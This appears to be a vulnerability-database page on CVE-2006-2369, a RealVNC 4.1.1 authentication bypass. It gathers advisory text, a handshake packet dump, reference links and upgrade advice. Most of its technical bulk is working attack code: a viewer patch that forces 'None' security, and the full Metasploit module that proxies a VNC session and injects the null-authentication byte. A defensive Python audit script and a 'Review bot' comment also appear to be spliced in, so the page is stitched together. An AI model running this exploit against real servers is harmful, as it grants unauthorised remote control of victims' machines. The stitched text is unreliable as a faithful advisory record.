CVE-2006-2369
CVSS 7.5
Published: 2006-05-15 12:06:00
Revised: 2016-10-17 23:39:51

[Original] RealVNC 4.1.1, and other products that use RealVNC such as AdderLink IP and Cisco CallManager, allows remote attackers to bypass authentication via a request in which the client specifies an insecure security type such as "Type 1 - None", which is accepted even if it is not offered by the server, as originally demonstrated using a long password.


[CNNVD] RealVNC RFB Protocol Remote Authentication Bypass Vulnerability (CNNVD-200605-290)

        RealVNC VNC Server is a remote terminal control software product.
        The RFB (Remote Frame Buffer) protocol used by RealVNC VNC Server lets the client and the server negotiate a suitable authentication method. The protocol implementation contains a design error that allows a remote attacker to bypass authentication and access the server without a password.
        The exchange proceeds as follows:
        1) The server sends its version, "RFB 003.008\n"
        2) The client replies with its version, "RFB 003.008\n"
        3) The server sends one byte equal to the number of security types it offers
        3a) The server sends a byte array listing the offered security types
        4) The client replies with one byte selecting a security type from the array sent in 3a
        5) A handshake is performed if required, followed by "0000" from the server
        RealVNC 4.1.1 and earlier, in their implementation of RFB 003.008, do not check whether the byte sent by the client in step 4 is one of the types the server offered in step 3a, so the authentication decision effectively moves from the server to the client. An attacker can force the client to request "Type 1 - None" as the security type and access the server without supplying a password.
        A typical packet dump follows:
        Server -> Client: 52 46 42 20 30 30 33 2e 30 30 38 0a <- Server version
        Client -> Server: 52 46 42 20 30 30 33 2e 30 30 38 0a <- Client version
        Server -> Client: 01 02 <- One field follows... and that field is 02
        (DES Challenge)
        Client -> Server: 01 <- Ahh, the lovely 1 byte exploit! Beautiful, isn't it?
        Server -> Client: 00 00 00 00 <-- Authenticated!
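The negotiation and the missing server-side check described above, as an added example (not RealVNC, CNNVD or Metasploit code; the function names and the constructed sample bytes are this example's own assumptions):

```python
# Added example, not RealVNC or Metasploit code: a model of the RFB 3.8 security-type
# negotiation described above. It parses the server's offer (step 3/3a) and the client's
# choice (step 4), shows the unvalidated selection attributed to RealVNC <= 4.1.1 beside
# the check a fixed server must make, and audits a captured handshake for a mismatch.
import re

SEC_TYPE_INVALID, SEC_TYPE_NONE, SEC_TYPE_VNCAUTH = 0, 1, 2
TYPE_NAMES = {SEC_TYPE_NONE: "None", SEC_TYPE_VNCAUTH: "VncAuth"}
VERSION_RE = re.compile(rb"^RFB (\d{3})\.(\d{3})\n$")

def parse_version(msg: bytes):
    """Step 1/2: b'RFB 003.008\\n' -> (3, 8); anything else is not an RFB greeting."""
    m = VERSION_RE.match(msg)
    if not m:
        raise ValueError("not an RFB version string: %r" % (msg,))
    return int(m.group(1)), int(m.group(2))

def parse_offer(msg: bytes):
    """Step 3/3a: one count byte, then that many security-type bytes.
    A count of 0 means the server refused the connection (a reason string follows)."""
    if not msg:
        raise ValueError("empty security-type message")
    count = msg[0]
    if len(msg) < 1 + count:
        raise ValueError("truncated security-type list")
    return list(msg[1:1 + count])

def vulnerable_select(offered, client_byte):
    """Behaviour the page describes for RealVNC <= 4.1.1: only the 'invalid' sentinel is
    rejected, so 0x01 (None) is honoured even when only 0x02 (VncAuth) was offered."""
    return None if client_byte == SEC_TYPE_INVALID else client_byte

def hardened_select(offered, client_byte):
    """Fixed behaviour: a type the server did not advertise is refused outright."""
    return client_byte if client_byte in offered else None

def audit_handshake(server_version, client_version, server_offer, client_choice):
    """Defender's check over a captured exchange: flags a choice outside the offered
    set, and the specific downgrade to None that CVE-2006-2369 relies on."""
    if parse_version(server_version)[0] != 3 or parse_version(client_version)[0] != 3:
        raise ValueError("only RFB 3.x negotiation is modelled here")
    offered = parse_offer(server_offer)
    chosen = client_choice[0]
    return {
        "offered": [TYPE_NAMES.get(t, t) for t in offered],
        "chosen": TYPE_NAMES.get(chosen, chosen),
        "unoffered_type": chosen not in offered,
        "auth_bypass_pattern": chosen == SEC_TYPE_NONE and SEC_TYPE_NONE not in offered,
    }

# Constructed sample: the exact bytes of the packet dump quoted above.
DUMP_SERVER_VERSION = bytes.fromhex("524642203030332e3030380a")  # "RFB 003.008\n"
DUMP_CLIENT_VERSION = bytes.fromhex("524642203030332e3030380a")
DUMP_SERVER_OFFER = bytes.fromhex("0102")  # one type offered: 02 = VncAuth (DES challenge)
DUMP_CLIENT_CHOICE = bytes.fromhex("01")   # client answers with 01 = None

if __name__ == "__main__":
    print(audit_handshake(DUMP_SERVER_VERSION, DUMP_CLIENT_VERSION,
                          DUMP_SERVER_OFFER, DUMP_CLIENT_CHOICE))
```

Run against a real capture, `audit_handshake` only needs the four messages of the handshake; a hit on `auth_bypass_pattern` is the signature to alert on, and `hardened_select` is the one-line check a server must perform before proceeding to step 5.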
        

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CWE (weakness category)

CWE-287 [Improper Authentication]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2369
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2369
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-290
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=full-disclosure&m=114768344111131&w=2
(UNKNOWN)  FULLDISC  20060515 RealVNC 4.1.1 Remote Compromise
http://marc.info/?l=vnc-list&m=114755444130188&w=2
(UNKNOWN)  MLIST  [vnc-list] 20060513 Version 4.1.2
http://securityreason.com/securityalert/8355
(UNKNOWN)  SREASON  8355
http://securitytracker.com/id?1016083
(PATCH)  SECTRACK  1016083
http://www.cisco.com/warp/public/707/cisco-sr-20060622-cmm.shtml
(UNKNOWN)  CISCO  20060622 RealVNC Remote Authentication Bypass Vulnerability
http://www.intelliadmin.com/blog/2006/05/security-flaw-in-realvnc-411.html
(UNKNOWN)  MISC  http://www.intelliadmin.com/blog/2006/05/security-flaw-in-realvnc-411.html
http://www.intelliadmin.com/blog/2006/05/vnc-flaw-proof-of-concept.html
(PATCH)  MISC  http://www.intelliadmin.com/blog/2006/05/vnc-flaw-proof-of-concept.html
http://www.kb.cert.org/vuls/id/117929
(VENDOR_ADVISORY)  CERT-VN  VU#117929
http://www.realvnc.com/products/free/4.1/release-notes.html
(PATCH)  CONFIRM  http://www.realvnc.com/products/free/4.1/release-notes.html
http://www.securityfocus.com/archive/1/archive/1/433994/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060515 RealVNC 4.1.1 Remote Compromise
http://www.securityfocus.com/archive/1/archive/1/434015/100/0/threaded
(PATCH)  BUGTRAQ  20060515 Re: [Full-disclosure] RealVNC 4.1.1 Remote Compromise
http://www.securityfocus.com/archive/1/archive/1/434117/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060516 re: RealVNC 4.1.1 Remote Compromise
http://www.securityfocus.com/archive/1/archive/1/434518/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060518 RE: [Full-disclosure] RealVNC 4.1.1 Remote Compromise
http://www.securityfocus.com/archive/1/archive/1/434560/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060520 Re: [Full-disclosure] RealVNC 4.1.1 Remote Compromise
http://www.securityfocus.com/archive/1/archive/1/438175/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060623 Linux VNC evil client patch - BID 17978
http://www.securityfocus.com/archive/1/archive/1/438368/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060624 Re: Linux VNC evil client patch - BID 17978
http://www.securityfocus.com/bid/17978
(PATCH)  BID  17978
http://www.vupen.com/english/advisories/2006/1790
(VENDOR_ADVISORY)  VUPEN  ADV-2006-1790
http://www.vupen.com/english/advisories/2006/1821
(VENDOR_ADVISORY)  VUPEN  ADV-2006-1821
http://www.vupen.com/english/advisories/2006/2492
(VENDOR_ADVISORY)  VUPEN  ADV-2006-2492
http://xforce.iss.net/xforce/xfdb/26445
(UNKNOWN)  XF  realvnc-auth-bypass(26445)

- Vulnerability information

RealVNC RFB Protocol Remote Authentication Bypass Vulnerability
High severity  Authorization issue
2006-05-15 00:00:00 2006-11-30 00:00:00
Remote

- Advisory and patch

        The vendor has released an upgrade patch to fix this security issue; download link:
        http://www.realvnc.com/download.html

- Vulnerability information (1791)

RealVNC 4.1.0 - 4.1.1 (VNC Null Authentication) Auth Bypass Patch/EXE (EDBID:1791)
multiple remote
2006-05-16 Verified
5900 redsand
N/A
xx  vnc-4_1_1-unixsrc.bl4ck/common/rfb/CConnection.cxx
--- vnc-4_1_1-unixsrc/common/rfb/CConnection.cxx        2005-03-11 09:08:41.000000000 -0600
+++ vnc-4_1_1-unixsrc.bl4ck/common/rfb/CConnection.cxx  2006-05-15 14:03:30.000000000 -0500
@@ -183,7 +183,12 @@

     // Inform the server of our decision
     if (secType != secTypeInvalid) {
-      os->writeU8(secType);
+
+      // [BL4CK] In response to the VNC Null Authentication
+      // force a secType to equal secTypeNone
+      // http://blacksecurity.org
+      secType = secTypeNone;
+      os->writeU8(secTypeNone);
       os->flush();
       vlog.debug("Choosing security type %s(%d)",secTypeName(secType),secType);     }
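Review bot: `secType = secTypeNone;` runs unconditionally inside `if (secType != secTypeInvalid)`, so the type the viewer actually negotiated from the server's list is thrown away and the following `vlog.debug("Choosing security type %s(%d)",secTypeName(secType),secType);` will always log None; the guard now only decides whether anything is sent at all, and the debug line no longer reflects the server's offer. Nothing in this hunk validates the choice against the list received in step 3a; as the page's own description of steps 3a and 4 states, that check belongs on the server side, and a server that enforces it refuses a None selection it never offered.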

Compiled: http://www.exploit-db.com/sploits/05162006-BL4CK-vncviewer-authbypass.rar


		

- Vulnerability information (17719)

RealVNC Authentication Bypass (EDBID:17719)
windows remote
2011-08-26 Verified
0 metasploit
N/A
##
# $Id: realvnc_41_bypass.rb 13641 2011-08-26 04:40:21Z bannedit $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


class Metasploit3 < Msf::Auxiliary
	include Msf::Exploit::Remote::Tcp
	
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'RealVNC Authentication Bypass',
			'Description'    => %q{
				This module exploits an Authentication Bypass Vulnerability
				in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy
				listener on LPORT and proxies to the target server

				The AUTOVNC option requires that vncviewer be installed on 
				the attacking machine. This option should be disabled for Pro
			},
			'Author'         => 
				[
					'hdm', #original msf2 module
					'TheLightCosine <thelightcosine[at]gmail.com>'
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 13641 $',
			'References'     =>
				[
					['BID', '17978'],
					['OSVDB', '25479'],
					['URL', 'http://secunia.com/advisories/20107/'],
					['CVE', 'CVE-2006-2369'],
				],
			'DisclosureDate' => 'May 15 2006'))

		register_options(
			[
				OptAddress.new('RHOST', [true, 'The Target Host']),
				OptPort.new('RPORT',    [true, "The port the target VNC Server is listening on", 5900 ]),
				OptPort.new('LPORT',    [true, "The port the local VNC Proxy should listen on", 5900 ]),
				OptBool.new('AUTOVNC',  [true, "Automatically Launch vncviewer from this host", true])
			], self.class)
	end

	def run
		#starts up the Listener Server
		print_status("starting listener")
		listener = Rex::Socket::TcpServer.create(
				'LocalHost' => '0.0.0.0',
				'LocalPort' => datastore['LPORT'],
				'Context'   => { 'Msf' => framework, 'MsfExploit' => self }
			)

		#If the AUTOVNC option is set to true this will spawn a vncviewer on the local machine
		#targeting the proxy listener.
		if (datastore['AUTOVNC'])
			unless (check_vncviewer())
				print_error("vncviewer does not appear to be installed, exiting!!!")
				return nil
			end
			print_status("Spawning viewer thread")	
			view = framework.threads.spawn("VncViewerWrapper", false) {
					system("vncviewer 127.0.0.1::#{datastore['LPORT']}")
			}
		end

		#Establishes the connection between the viewer and the remote server
		client = listener.accept
		add_socket(client)

		s = Rex::Socket::Tcp.create(
				'PeerHost' => datastore['RHOST'],
				'PeerPort' => datastore['RPORT'],
				'Timeout' => 1
				)
		add_socket(s)
		serverhello = s.gets
		unless serverhello.include? "RFB 003.008"
			print_error("The VNCServer is not vulnerable")
			return
		end

		#MitM attack on the VNC Authentication Process
		client.puts(serverhello)
		clienthello = client.gets
		s.puts(clienthello)
		authmethods = s.recv(2)
		print_status("Auth Methods Received. Sending Null Authentication Option to Client")
		client.write("\x01\x01")
		client.recv(1)
		s.write("\x01")
		s.recv(4)
		client.write("\x00\x00\x00\x00")

		#handles remaining proxy operations between the two sockets
		closed = false
		while(closed == false)
			sockets =[]
			sockets << client
			sockets << s
			selected = select(sockets,nil,nil,0)
			#print_status ("Selected: #{selected.inspect}")
			unless selected.nil?
				if selected[0].include?(client)
					#print_status("Transferring from client to server")
					begin
						data = client.sysread(8192)
						if data.nil?
							print_error("Client Closed Connection")
							closed = true
						else
							s.write(data)
						end
					rescue
						print_error("Client Closed Connection")	
						closed = true
					end
				end
				if selected[0].include?(s)
					#print_status("Transferring from server to client")
					begin
						data = s.sysread(8192)
						if data.nil?
							print_error("Server Closed Connection")
							closed = true
						else
							client.write(data)
						end
					rescue
						closed = true
					end
				end
			end
		end

		#Garbage Collection
		s.close
		client.close
		print_status("Listener Closed")

		if (datastore['AUTOVNC'])
			view.kill
			print_status("Viewer Closed")
		end
	end

	def check_vncviewer
		vnc =
			Rex::FileUtils::find_full_path('vncviewer') ||
			Rex::FileUtils::find_full_path('vncviewer.exe')
		if (vnc)
			return true
		else
			return false
		end
	end
end
		

- Vulnerability information (F104471)

RealVNC Authentication Bypass (PacketStormID:F104471)
2011-08-26 00:00:00
H D Moore,The Light Cosine  metasploit.com
exploit,bypass
CVE-2006-2369,OSVDB-25479

This Metasploit module exploits an Authentication Bypass Vulnerability in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy listener on LPORT and proxies to the target server. The AUTOVNC option requires that vncviewer be installed on the attacking machine. This option should be disabled for Pro.


- Vulnerability information

25479
RealVNC Security Type Enforcement Failure Remote Authentication Bypass
Remote / Network Access Authentication Management
Loss of Confidentiality
Exploit Public, Exploit Commercial Vendor Verified

- Vulnerability description

RealVNC contains a flaw that may allow a malicious user to bypass authentication and allows access to the remote system without requiring knowledge of the VNC password. The issue is triggered due to an error within the handling of VNC password authentication requests. This flaw may lead to a loss of confidentiality.

- Timeline

2006-05-15 Unknown
2006-05-15 Unknown

- Solution

Upgrade to version 4.1.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

- Vulnerability information

RealVNC Remote Authentication Bypass Vulnerability
Design Error 17978
Yes No
2006-05-15 12:00:00 2007-11-15 12:36:00
Steve Wiseman discovered this vulnerability.

- Affected program versions

RealVNC RealVNC Personal Edition 4.2.2
RealVNC RealVNC Personal Edition 4.2
RealVNC RealVNC Personal Edition 4.1
RealVNC RealVNC Personal Edition 4.0
RealVNC RealVNC Free Edition 4.1.1
RealVNC RealVNC Free Edition 4.1
RealVNC RealVNC Free Edition 4.0
RealVNC RealVNC Enterprise Edition 4.2.2
RealVNC RealVNC Enterprise Edition 4.2
RealVNC RealVNC Enterprise Edition 4.1
RealVNC RealVNC Enterprise Edition 4.0
Cisco IP/VC 3540/DCS 0
RealVNC RealVNC Personal Edition 4.2.3
RealVNC RealVNC Free Edition 4.1.2
RealVNC RealVNC Enterprise Edition 4.2.3

- Unaffected program versions

RealVNC RealVNC Personal Edition 4.2.3
RealVNC RealVNC Free Edition 4.1.2
RealVNC RealVNC Enterprise Edition 4.2.3

- Vulnerability discussion

RealVNC is susceptible to an authentication-bypass vulnerability. This issue is due to a flaw in the authentication process of the affected package.

Exploiting this issue allows attackers to gain unauthenticated, remote access to the VNC servers.

RealVNC 4.1.1 is vulnerable to this issue; other versions may also be affected.

UPDATE (May 25, 2006): Reports indicate that this issue is being actively exploited in the wild.

- Exploitation

To exploit this issue, attackers will likely modify readily available open-source VNC client software.

Exploit code is available by the reporter of this issue. It is not currently known to be publicly available.

HD Moore has provided an example using the Metasploit Framework. BL4CK has supplied a patch to VNC 4.1.1 to exploit this issue.

A scanner application is available by ad@heapoverflow.com. Note that Symantec has neither tested this scanner application nor verified it to be safe. Please see the references for more information.

A multi-threaded scanner application based on the ad@heapoverflow.com version is available from Matt Venzke. Note that Symantec has neither tested this scanner application nor verified it to be safe.

embyte has supplied a patch to VNC 4.1.1 to exploit this issue.

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

- Solution

The vendor has released fixes to address this issue.


RealVNC RealVNC Enterprise Edition 4.1

RealVNC RealVNC Free Edition 4.1

RealVNC RealVNC Personal Edition 4.1

RealVNC RealVNC Enterprise Edition 4.0

Cisco IP/VC 3540/DCS 0

RealVNC RealVNC Free Edition 4.0

RealVNC RealVNC Personal Edition 4.0

RealVNC RealVNC Free Edition 4.1.1

- Related references

 

 
